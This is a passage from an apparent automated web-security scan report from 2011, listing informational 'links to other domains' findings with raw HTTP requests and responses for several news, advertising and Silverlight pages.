<div class="link"><a href="http://www.facebook.com/msnbc/">msnbc.com on Facebook</a>
...[SNIP]...
<li><a href="http://privacy.microsoft.com/en-us/default.mspx">MSN Privacy</a>
...[SNIP]...

22.447. http://www.neudesicmediagroup.com/Advertising.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.neudesicmediagroup.com
Path:	/Advertising.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight

The response contains the following links to other domains:

http://ajax.microsoft.com/ajax/jquery.validate/1.7/jquery.validate.min.js?v=3
http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=Neudesic+LLC,+Irvine,+CA&sll=33.649208,-117.743568&sspn=0.106745,0.222988&gl=us&g=8105+Irvine+Center+Dr,+Irvine,+Orange,+California+92618&ie=UTF8&hq=Neudesic+LLC,&hnear=Irvine,+CA&ll=33.657781,-117.768116&spn=0.106735,0.222988&z=13&iwloc=A&cid=5022547561072180428
http://s18.sitemeter.com/js/counter.js?site=s18neumedia
http://s18.sitemeter.com/meter.asp?site=s18neumedia
http://s18.sitemeter.com/stats.asp?site=s18neumedia
http://twitter.com/NeudesicMedia
http://www.facebook.com/pages/Neudesic-Media-Group/106923456664
http://www.neudesic.com/

Request

GET /Advertising.aspx?site=Silverlight HTTP/1.1
Host: www.neudesicmediagroup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:23:55 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Cache-Control: private
Set-Cookie: ASP.NET_SessionId=5kpaue2f1i25ymtknnkzbtlb; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 11100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Contact Us |
...[SNIP]...
content="online advertising, microsoft advertising, internet advertising, web advertising, advertising network, buy advertising, sell advertising, internet ads, media solutions for publishers" />

   <script type="text/javascript" src="http://ajax.microsoft.com/ajax/jquery.validate/1.7/jquery.validate.min.js?v=3"></script>
...[SNIP]...
</a>
                       <a href="http://twitter.com/NeudesicMedia" class="twitter">
                           <img src="/resources/images/spacer.gif?v=3" alt="Twitter" width="24" height="23" border="0" /></a>
                       <a href="http://www.facebook.com/pages/Neudesic-Media-Group/106923456664" class="facebook">
                           <img src="/resources/images/spacer.gif?v=3" alt="Facebook" width="24" height="23" border="0" />
...[SNIP]...
<div class="map">
                   <a target="_blank" href="http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=Neudesic+LLC,+Irvine,+CA&sll=33.649208,-117.743568&sspn=0.106745,0.222988&gl=us&g=8105+Irvine+Center+Dr,+Irvine,+Orange,+California+92618&ie=UTF8&hq=Neudesic+LLC,&hnear=Irvine,+CA&ll=33.657781,-117.768116&spn=0.106735,0.222988&z=13&iwloc=A&cid=5022547561072180428">
                       <img src="/resources/images/map.jpg?v=3" alt="Map" />
...[SNIP]...
<p class="leftt">
               Neudesic, LLC ©
               2011. All Rights Reserved. Neudesic Media Group is a division of Neudesic, LLC. - <a rel="nofollow" href="http://www.neudesic.com/" target="_blank">www.neudesic.com</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s18.sitemeter.com/js/counter.js?site=s18neumedia"></script>
   <noscript>
       <a rel="nofollow" href="http://s18.sitemeter.com/stats.asp?site=s18neumedia" target="_blank">
           <img src="http://s18.sitemeter.com/meter.asp?site=s18neumedia" alt="Site Meter" border="0" /></a>
...[SNIP]...

22.448. https://www.newsvine.com/_nv/accounts/msnbc/newsletters previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/accounts/msnbc/newsletters

Issue detail

The page was loaded from a URL containing a query string:

https://www.newsvine.com/_nv/accounts/msnbc/newsletters?affiliate=todayshow.com&categoryFilter=today

The response contains the following links to other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/autocomplete/autocomplete-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/button/button-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/container/container-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/cookie/cookie-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/datasource/datasource-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/history/history-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/json/json-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/menu/menu-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/resize/resize-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/selector/selector-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/utilities/utilities.js
https://ajax.googleapis.com/ajax/libs/yui/2.8.0/build/event-delegate/event-delegate-min.js

Request

GET /_nv/accounts/msnbc/newsletters?affiliate=todayshow.com&categoryFilter=today HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:59:01 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=aa2558f56ab4ceb5950694a90bd5037a; expires=Sat, 25-Jan-2031 01:59:01 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 18080

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-
...[SNIP]...
<link rel="shortcut icon" href="http://lib.newsvine.com/chrome/today/images/favicon.ico" type="image/x-icon" />
<link rel="stylesheet" type="text/css" href="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/utilities/utilities.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/datasource/datasource-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/autocomplete/autocomplete-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/container/container-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/button/button-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/cookie/cookie-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/history/history-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/json/json-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/resize/resize-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.8.0/build/event-delegate/event-delegate-min.js"></script>
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://www.msnbc.redacted/default.ashx/id/36009898#msnbc.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

22.449. https://www.newsvine.com/_nv/accounts/register previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/accounts/register

Issue detail

The page was loaded from a URL containing a query string:

https://www.newsvine.com/_nv/accounts/register?referrer=toolbar

The response contains the following links to other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/autocomplete/autocomplete-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/button/button-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/container/container-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/cookie/cookie-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/datasource/datasource-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/history/history-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/json/json-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/menu/menu-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/resize/resize-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/selector/selector-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/utilities/utilities.js
https://ajax.googleapis.com/ajax/libs/yui/2.8.0/build/event-delegate/event-delegate-min.js

Request

GET /_nv/accounts/register?referrer=toolbar HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:59:01 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=e0f0a5a558fe414b9dba8fc387d2b490; expires=Sat, 25-Jan-2031 01:59:01 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 11767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<meta name="verify-v1" content="lOHw3AgC2uTfC5d6ZebPJTLQWI+imhirT6wlZJrJBuw=" />
<link rel="stylesheet" type="text/css" href="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/utilities/utilities.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/datasource/datasource-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/autocomplete/autocomplete-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/container/container-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/button/button-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/cookie/cookie-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/history/history-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/json/json-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/resize/resize-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.outblush.com
Path:	/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.redacted\|msn.com/wonderwall\|v14.msn.com/\|preview.redacted/\|www.redacted/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The page was loaded from a URL containing a query string:

http://www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/?\w+|mtv.com/$|mtv.com/ontv/\?\w+|mtv.com/ontv/$|http://www.pcmag.com/&|http://www.pcmag.com/reviews|http://www.pcmag.com/category2/0,2806,24,00.asp|http://www.pcmag.com/category2/0,2806,9,00.asp|http://www.pcmag.com/category2/0,2806,4829,00.asp|http://www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http://www.terra.com.mx/default.htm|http://www.terra.com/$|www.people.com/$|http://www.walmart.com/|http://www.walmart.com/cp/toys/4171|http://www.walmart.com/cp/Electronics/3944

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/Outblush/hp;kw=top;tile=1;sz=728x90;ord=123456789?
http://ad.doubleclick.net/jump/Outblush/hp;kw=top;tile=1;sz=728x90;ord=123456789?
http://feeds.feedburner.com/outblush
http://outblushcom.skimlinks.com/api/skimlinks.js
http://ui.ibsrv.net/ibsrv/res/src:www.outblush.com/get/i/feed.gif
http://www.bargainist.com/
http://www.internetbrands.com/ib/privacy/travel?site=www.outblush.com
http://www.internetbrands.com/ib/terms/travel?site=www.outblush.com&hasRSS=true

Request

GET /|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/?\w+|mtv.com/$|mtv.com/ontv/\?\w+|mtv.com/ontv/$|http://www.pcmag.com/&|http://www.pcmag.com/reviews|http://www.pcmag.com/category2/0,2806,24,00.asp|http://www.pcmag.com/category2/0,2806,9,00.asp|http://www.pcmag.com/category2/0,2806,4829,00.asp|http://www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http://www.terra.com.mx/default.htm|http://www.terra.com/$|www.people.com/$|http://www.walmart.com/|http://www.walmart.com/cp/toys/4171|http://www.walmart.com/cp/Electronics/3944 HTTP/1.1
Host: www.outblush.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 11007
Date: Sun, 30 Jan 2011 02:01:04 GMT
Age: 0
Connection: close
Server: IBSrv 1.0
Set-Cookie: BIGipServerbargainist_POOL=1492848812.52514.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">
<head>

...[SNIP]...
<link rel="shortcut icon" href="/favicon.ico" type="image/ico" />
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://feeds.feedburner.com/outblush" />
<script language="Javascript" type="text/javascript">
...[SNIP]...
<noscript>
<a href="http://ad.doubleclick.net/jump/Outblush/hp;kw=top;tile=1;sz=728x90;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/Outblush/hp;kw=top;tile=1;sz=728x90;ord=123456789?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
</a> | <a href="http://feeds.feedburner.com/outblush">RSS Feed</a> <a href="http://feeds.feedburner.com/outblush"><img src="http://ui.ibsrv.net/ibsrv/res/src:www.outblush.com/get/i/feed.gif" width="12" height="12" alt="RSS" border="0" class="feed" /></a>
...[SNIP]...
<br />
Looking for coupons and deals from your favorite retailers? Visit <a href="http://www.bargainist.com">The Bargainist: your personal coupon shopper</a><br />
<a href="http://www.internetbrands.com/ib/privacy/travel?site=www.outblush.com">Privacy Policy</a>. <a href="http://www.internetbrands.com/ib/terms/travel?site=www.outblush.com&hasRSS=true">Terms of Use</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://outblushcom.skimlinks.com/api/skimlinks.js"></script>
...[SNIP]...

22.451. http://www.scout.com/a.z previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/a.z

Issue detail

The page was loaded from a URL containing a query string:

http://www.scout.com/a.z?s=143&p=3&blipid=14568

The response contains the following links to other domains:

http://ads1.redacted/library/dap.js
http://advertising.msn.com/msn/
http://b.scorecardresearch.com/p?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cj=1
http://entertainment.msn.com/
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://lifestyle.redacted/
http://moneycentral.msn.com/home.asp
http://pt200191.unica.com/ntpagetag.gif?js=0&site=scout.com
http://rss.redacted/
http://specials.redacted/alphabet.aspx
http://www.bing.com/search?FORM=FOXSP
http://www.foxsports.com/
http://www.redacted/
http://www.ticketcity.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Sun, 30 Jan 2011 01:25:11 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 01:35:11 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb9
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.186 in 44 ms
Vary: Accept-Encoding
Content-Length: 22873

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Choose College Team Site</title>
<meta ht
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
<div class="left"><a class="logo" href="http://www.redacted/"><img src="http://cdn-cms.scout.com/images/layout/msn.gif" alt="MSN" />
...[SNIP]...
<li><a href="http://entertainment.redacted/">Entertainment</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/home.asp">Money</a>
...[SNIP]...
<li><a href="http://lifestyle.redacted/">Lifestyle</a>
...[SNIP]...
<li><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
</ul><a class="logo logo-bing" href="http://www.bing.com/search?FORM=FOXSP">Bing</a>
...[SNIP]...
<li><a class="img" href="http://www.foxsports.com/"><img src="http://cdn-cms.scout.com/images/layout/menu-item-fox-sports.gif" alt="FOXSports" />
...[SNIP]...
<li><a class="external" href="http://www.ticketcity.com/">Tickets</a>
...[SNIP]...
<p class="left">
                   <a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
                   <a href="http://g.redacted/0TO_/enus">Legal</a>
                   <a href="http://advertising.redacted/msn/">Advertise on MSN</a>
                   <a href="http://g.redacted/AIPRIV/en-us">About our ads</a>
                   <a href="http://rss.redacted/">RSS</a>
...[SNIP]...
<noscript>
       <img src="http://pt200191.unica.com/ntpagetag.gif?js=0&site=scout.com" height="1" width="1" border="0" hspace="0" vspace="0" alt="" />
       <img src="http://b.scorecardresearch.com/p?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cj=1" />
   </noscript>
...[SNIP]...

22.452. http://www.scout.com/search.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/search.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.scout.com/search.aspx?s=143

The response contains the following links to other domains:

http://ads1.redacted/library/dap.js
http://advertising.msn.com/msn/
http://b.scorecardresearch.com/p?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cj=1
http://entertainment.msn.com/
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://lifestyle.redacted/
http://moneycentral.msn.com/home.asp
http://pt200191.unica.com/ntpagetag.gif?js=0&site=scout.com
http://rss.redacted/
http://specials.redacted/alphabet.aspx
http://www.bing.com/search?FORM=FOXSP
http://www.foxsports.com/
http://www.redacted/
http://www.ticketcity.com/

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:27:31 GMT
Server: Microsoft-IIS/6.0
Server: Summit
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14267

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Search</title>
<meta http-equiv="Content-
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
<div class="left"><a class="logo" href="http://www.redacted/"><img src="http://cdn-cms.scout.com/images/layout/msn.gif" alt="MSN" />
...[SNIP]...
<li><a href="http://entertainment.redacted/">Entertainment</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/home.asp">Money</a>
...[SNIP]...
<li><a href="http://lifestyle.redacted/">Lifestyle</a>
...[SNIP]...
<li><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
</ul><a class="logo logo-bing" href="http://www.bing.com/search?FORM=FOXSP">Bing</a>
...[SNIP]...
<li><a class="img" href="http://www.foxsports.com/"><img src="http://cdn-cms.scout.com/images/layout/menu-item-fox-sports.gif" alt="FOXSports" />
...[SNIP]...
<li><a class="external" href="http://www.ticketcity.com/">Tickets</a>
...[SNIP]...
<p class="left">
                   <a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
                   <a href="http://g.redacted/0TO_/enus">Legal</a>
                   <a href="http://advertising.redacted/msn/">Advertise on MSN</a>
                   <a href="http://g.redacted/AIPRIV/en-us">About our ads</a>
                   <a href="http://rss.redacted/">RSS</a>
...[SNIP]...
<noscript>
       <img src="http://pt200191.unica.com/ntpagetag.gif?js=0&site=scout.com" height="1" width="1" border="0" hspace="0" vspace="0" alt="" />
       <img src="http://b.scorecardresearch.com/p?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cj=1" />
   </noscript>
...[SNIP]...

22.453. http://www.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.silverlight.net/adchain.html?ZoneID=37&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.asp.net/a.aspx?Task=Click&ZoneID=37&CampaignID=1887&AdvertiserID=2&BannerID=2552&SiteID=2&RandomNumber=537257586&Keywords=
http://ads.asp.net/ads/SL-Dec-Jan-Develop.jpg

Request

GET /adchain.html?ZoneID=37&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/%2526ot%253DA
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:19 GMT
Content-Length: 355

<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=37&CampaignID=1887&AdvertiserID=2&BannerID=2552&SiteID=2&RandomNumber=537257586&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/SL-Dec-Jan-Develop.jpg" width="300" height="250" alt="" align="Center" border="0"></a>
...[SNIP]...

22.454. http://www.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.silverlight.net/adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=520&AdvertiserID=51&BannerID=474&SiteID=6&RandomNumber=108728803&Keywords=
http://ads.neudesicmediagroup.com/ads/ClientUI%20ad4%20(728x90).jpg

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/showcase/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:22:47 GMT
Content-Length: 390

<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=520&AdvertiserID=51&BannerID=474&SiteID=6&RandomNumber=108728803&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/ClientUI%20ad4%20(728x90).jpg" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

22.455. http://www.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/adchain.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.silverlight.net/adchain.html?ZoneID=465&Task=Get&ifr=true&SiteID=2

The response contains the following links to other domains:

http://ads.asp.net/a.aspx?Task=Click&ZoneID=465&CampaignID=1858&AdvertiserID=9&BannerID=2574&SiteID=2&RandomNumber=888561024&Keywords=
http://ads.asp.net/ads/300x250-WP7.gif

Request

GET /adchain.html?ZoneID=465&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/devices/windows-phone/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/getstarted/devices/windows-phone/%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:27 GMT
Content-Length: 349

